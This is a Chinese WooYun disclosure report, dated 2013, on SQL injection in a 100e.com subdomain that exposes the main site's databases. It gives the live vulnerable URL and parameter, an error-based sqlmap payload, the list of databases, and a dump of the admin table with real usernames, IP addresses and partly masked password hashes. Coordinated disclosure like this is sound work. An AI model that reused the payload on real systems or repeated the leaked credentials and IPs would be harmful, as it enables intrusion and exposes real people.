漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-033804
漏洞标题:100e从分站SQL注入主站数据库
相关厂商:100e.com
漏洞作者: Hxai11
提交时间:2013-08-08 10:20
修复时间:2013-09-22 10:21
公开时间:2013-09-22 10:21
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-08: 细节已通知厂商并且等待厂商处理中
2013-08-08: 厂商已经确认,细节仅向厂商公开
2013-08-18: 细节向核心白帽子及相关领域专家公开
2013-08-28: 细节向普通白帽子公开
2013-09-07: 细节向实习白帽子公开
2013-09-22: 细节向公众公开
简要描述:
可以各种泄露啊。。。
详细说明:
注入地址:http://client.100e.com/tool/Book/Courseware/Add/index.aspx?categoryID=2
想必这个地址比较隐秘,怎么发现的呢。。
http://img.100e.com/js/Common/地址
发现其中一个就是http://client.100e.com/tool/EnterRoom
于是访问了一下,爆出了源码,于是去掉EnterRoom,之后就吓尿了,阅遍了。。
当我到这个目录的时候,sql注入即将产生
看这个地址
我在后面加个'
![SNY7]6NU4P(MN]HB%1VQ)I4.jpg](https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201308/080957383a687679b30822eb4e24edb4f662a742.jpg)
看到了吧,注入产生,于是马上sqlmap跑
之后......
想必是连接到了主站的数据库
Database: 100eDB
Table: Admin_Member
[10 entries]
+----+---------------------+----------+---------------------+-----------------+-
------------+---------------------+-------------+------------------+
| id | CPWdDate | Disabled | BuildDate | LastLogIP |
MemberName | LastLogDate | Description | MemberPassWord |
+----+---------------------+----------+---------------------+-----------------+-
------------+---------------------+-------------+------------------+
| 25 | 2013-03-15 19:55:03 | 0 | 2005-09-01 19:32:14 | 113.77.205.65 |
symen | 2013-07-29 11:36:13 | <blank> | **fc9184dae7aa** |
| 26 | 2007-12-03 10:27:09 | 1 | 2005-09-05 12:58:57 | 210.51.18.37 |
lvyang | 2007-12-04 13:06:03 | ?? | <blank> |
| 27 | 2009-04-26 09:29:56 | 1 | 2005-09-12 17:08:11 | 211.103.201.164 |
xyp | 2010-01-14 17:54:19 | <blank> | <blank> |
| 28 | 2007-12-12 17:21:31 | 1 | 2005-09-15 13:06:48 | 210.51.18.37 |
pxc | 2008-02-13 17:40:51 | <blank> | <blank> |
| 30 | 2009-04-16 11:36:34 | 1 | 2005-09-16 13:11:33 | 123.114.176.16 |
rogerguo | 2011-04-25 13:46:08 | <blank> | <blank> |
| 31 | 2009-05-05 17:37:14 | 0 | 2005-09-16 15:35:35 | 60.10.199.57 |
xiehaiying | 2013-06-03 10:53:21 | <blank> | 50387a114988bf7d |
| 32 | 2009-05-05 17:38:07 | 0 | 2005-09-16 15:38:56 | 60.10.199.57 |
xiehaiying1 | 2012-12-18 12:36:29 | <blank> | **387a114988bf** |
| 34 | 2009-05-14 13:56:26 | 1 | 2005-09-16 18:00:11 | 211.103.201.164 |
liubo | 2011-04-07 14:36:52 | <blank> | <blank> |
| 35 | 2008-05-20 17:45:35 | 0 | 2005-09-16 19:13:08 | 210.51.18.37 |
panhai | 2008-05-20 17:45:53 | <blank> | <blank> |
| 36 | 2009-04-30 15:18:16 | 0 | 2005-09-19 13:51:07 | 60.10.199.57 |
xiaoshoubu | 2013-08-07 13:55:52 | ??? | **ca0b7ca95ec3** |
+----+---------------------+----------+---------------------+-----------------+-
------------+---------------------+-------------+------------------+
Place: GET
Parameter: categoryID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: categoryID=2 AND (SELECT 9497 FROM(SELECT COUNT(*),CONCAT(0x7174667
871,(SELECT (CASE WHEN (9497=9497) THEN 1 ELSE 0 END)),0x716a716571,FLOOR(RAND(0
)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
available databases [23]:
[*] 100eDB
[*] 100eDB2
[*] 100eZone
[*] Admin
[*] AppendDB
[*] Book
[*] Chat7
[*] Chat7_Log
[*] ClientLog
[*] Course
[*] Edu
[*] Group
[*] information_schema
[*] IPLocation
[*] mysql
[*] School
[*] TEC
[*] TemporaryDB
[*] test
[*] User
[*] VC2008
[*] VC6
[*] VC7
漏洞证明:
![FZLLP6CTX6DHXD`EL}`I]HX.jpg](https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201308/08100113538ef69617ee99a01e61e97c825bbb5a.jpg)
修复方案:
防注入走起
版权声明:转载请注明来源 Hxai11@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-08-08 13:48
厂商回复:
谢谢提醒,马上修改。
最新状态:
暂无
漏洞评价:
评论
-
如何做到的
( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)